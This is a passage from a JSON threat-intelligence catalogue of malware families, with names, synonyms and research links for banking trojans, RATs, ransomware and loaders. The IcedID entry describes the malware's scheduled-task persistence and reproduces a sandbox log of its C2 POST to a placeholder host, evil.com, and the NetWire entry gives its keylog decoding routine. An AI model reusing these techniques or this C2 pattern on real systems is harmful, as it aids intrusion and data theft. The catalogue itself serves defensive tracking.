"https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2",
"https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/",
"https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan"
]
}
},
{
"uuid": "8410d208-7450-407d-b56c-e5c1ced19632",
"value": "gsecdump",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://attack.mitre.org/wiki/Technique/T1003"
]
}
},
{
"uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de",
"value": "nRansom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/910952333084971008",
"https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
"https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/"
]
}
},
{
"uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f",
"value": "RedAlert2",
"description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores",
"https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html"
]
}
},
{
"uuid": "080b2071-2d69-4b76-962e-3d0142074bcb",
"value": "Qadars",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
"https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf",
"https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
"https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
"https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
"https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/"
]
}
},
{
"uuid": "42fa55e3-e708-4c11-b807-f31573639941",
"value": "Retadup",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
]
}
},
{
"uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6",
"value": "Unlock92",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/810753660737073153",
"https://twitter.com/bartblaze/status/976188821078462465"
]
}
},
{
"uuid": "551b568f-68fa-4483-a10c-a6452ae6289e",
"value": "Jimmy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
]
}
},
{
"uuid": "f856a7c7-768e-415f-90f8-80a914c77083",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [
"fysbis",
"splm",
"chopstick"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
]
}
},
{
"uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17",
"value": "Kronos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
"https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en",
"https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
"https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en",
"https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
"https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
"https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/"
]
}
},
{
"uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f",
"value": "WebC2-Bolid",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "52608ecb-3625-434a-88ef-9806b9b04e61",
"value": "Erebus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/"
]
}
},
{
"uuid": "d95f0171-8c5c-48ff-a22f-a8c20c196819",
"value": "Mirai",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
"https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
"https://isc.sans.edu/diary/22786",
"https://github.com/jgamblin/Mirai-Source-Code",
"http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/"
]
}
},
{
"uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303",
"value": "PandaBanker",
"description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.",
"meta": {
"synonyms": [
"ZeusPanda"
],
"type": [],
"refs": [
"https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
"https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
"https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
"https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market",
"https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media",
"https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/",
"https://www.spamhaus.org/news/article/771/",
"http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
"https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks",
"https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
"https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
"https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/",
"http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
"https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/"
]
}
},
{
"uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec",
"value": "SmokeLoader",
"description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.",
"meta": {
"synonyms": [
"Dofoil"
],
"type": [],
"refs": [
"https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/",
"https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
"https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo",
"https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
"https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
"https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
"https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
"https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
"https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/"
]
}
},
{
"uuid": "07f46d21-a5d4-4359-8873-18e30950df1a",
"value": "Andromeda",
"description": "",
"meta": {
"synonyms": [
"Gamarue",
"B106-Gamarue",
"B67-SS-Gamarue",
"b66"
],
"type": [],
"refs": [
"https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet",
"https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
"https://blog.avast.com/andromeda-under-the-microscope",
"https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
"http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/",
"http://blog.morphisec.com/andromeda-tactics-analyzed",
"https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
"http://resources.infosecinstitute.com/andromeda-bot-analysis/",
"http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
"https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08",
"https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/",
"https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
"https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
"https://blog.fortinet.com/2014/04/23/andromeda-2-7-features",
"https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html"
]
}
},
{
"uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2",
"value": "DE Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
"https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users"
]
}
},
{
"uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6",
"value": "CrashOverride",
"description": "",
"meta": {
"synonyms": [
"Crash",
"Industroyer"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
"https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
"https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
]
}
},
{
"uuid": "1ecbcd20-f238-47ef-874b-08ef93266395",
"value": "Dyre",
"description": "",
"meta": {
"synonyms": [
"Dyreza"
],
"type": [],
"refs": [
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
"https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
"https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates"
]
}
},
{
"uuid": "7759534c-3298-42e9-adab-896d7e507f4f",
"value": "MaMi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x26.html"
]
}
},
{
"uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38",
"value": "Xtreme RAT",
"description": "",
"meta": {
"synonyms": [
"ExtRat"
],
"type": [],
"refs": [
"https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017",
"https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
"https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat",
"https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html"
]
}
},
{
"uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16",
"value": "IcedID Downloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
"https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/"
]
}
},
{
"uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
"value": "elf.wellmess",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7",
"value": "MalumPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf"
]
}
},
{
"uuid": "721fe429-f240-4fd6-a5c9-187195624b51",
"value": "Banatrix",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/banatrix-an-indepth-look/"
]
}
},
{
"uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd",
"value": "UPAS",
"description": "",
"meta": {
"synonyms": [
"Rombrast"
],
"type": [],
"refs": [
"https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html",
"https://twitter.com/ulexec/status/1005096227741020160",
"https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/"
]
}
},
{
"uuid": "53021414-97ad-4102-9cff-7a0e1997f867",
"value": "Imminent Monitor RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/"
]
}
},
{
"uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8",
"value": "CryptXXXX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
]
}
},
{
"uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0",
"value": "LatentBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html",
"https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access",
"http://malware-traffic-analysis.net/2017/04/25/index.html",
"https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/",
"https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/"
]
}
},
{
"uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd",
"value": "PowerDuke",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
]
}
},
{
"uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1",
"value": "Rombertik",
"description": "",
"meta": {
"synonyms": [
"CarbonGrabber"
],
"type": [],
"refs": [
"http://blogs.cisco.com/security/talos/rombertik"
]
}
},
{
"uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30",
"value": "MirageFox",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
]
}
},
{
"uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74",
"value": "Tempedreve",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf",
"value": "IRRat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
]
}
},
{
"uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7",
"value": "Kuaibu",
"description": "",
"meta": {
"synonyms": [
"Barys",
"Gofot",
"Kuaibpy"
],
"type": [],
"refs": []
}
},
{
"uuid": "70cd1eb4-0410-47c6-8817-418380240d85",
"value": "Logedrut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
]
}
},
{
"uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9",
"value": "Jager Decryptor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151",
"value": "BrutPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html"
]
}
},
{
"uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
"value": "Joao",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/"
]
}
},
{
"uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc",
"value": "EvilGrab",
"description": "",
"meta": {
"synonyms": [
"Vidgrab"
],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf"
]
}
},
{
"uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb",
"value": "KAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
"value": "GlanceLove",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
"https://www.ci-project.org/blog/2017/3/4/arid-viper",
"https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
"https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
"https://www.clearskysec.com/glancelove/"
]
}
},
{
"uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740",
"value": "NetWire RC",
"description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n",
"meta": {
"synonyms": [
"Recam"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
"http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
"https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
"http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
"https://www.circl.lu/pub/tr-23/"
]
}
},
{
"uuid": "d77eacf7-090f-4cf6-a305-79a372241158",
"value": "GetMyPass",
"description": "",
"meta": {
"synonyms": [
"getmypos"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/",
"https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
"https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware"
]
}
},
{
"uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248",
"value": "Bella",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/kai5263499/Bella",
"https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/"
]
}
},
{
"uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376",
"value": "jRAT",
"description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.",
"meta": {
"synonyms": [
"Jacksbot"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
"https://github.com/java-rat",
"https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered"
]
}
},
{
"uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371",
"value": "Solarbot",
"description": "",
"meta": {
"synonyms": [
"Napolar"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/",
"https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/"
]
}
},
{
"uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8",
"value": "CoinThief",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
]
}
},
{
"uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f",
"value": "VM Zeus",
"description": "",
"meta": {
"synonyms": [
"VMzeus",
"ZeusVM",
"Zberp"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
"https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
"https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf"
]
}
},
{
"uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec",
"value": "SocksBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
]
}
},
{
"uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a",
"value": "Emdivi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
"http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html",
"https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/"
]
}
},
{
"uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91",
"value": "Satan Ransomware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
"https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
"https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html"
]
}
},
{
"uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa",
"value": "Microcin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
"https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf"
]
}
},
{
"uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410",
"value": "Tapaoux",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf"
]
}
},
{
"uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
"value": "MysteryBot",
"description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
]
}
},
{
"uuid": "9481d7b1-307c-4504-9333-21720b85317b",
"value": "Cohhoc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf"
]
}
},
{
"uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789",
"value": "FakeDGA",
"description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).",
"meta": {
"synonyms": [
"WillExec"
],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
"https://github.com/360netlab/DGA/issues/36",
"http://www.freebuf.com/column/153424.html"
]
}
},
{
"uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330",
"value": "IcedID",
"description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
"meta": {
"synonyms": [
"BokBot"
],
"type": [],
"refs": [
"http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
"https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
"https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
"https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid"
]
}
},
{
"uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2",
"value": "TreasureHunter",
"description": "",
"meta": {
"synonyms": [
"huntpos"
],
"type": [],
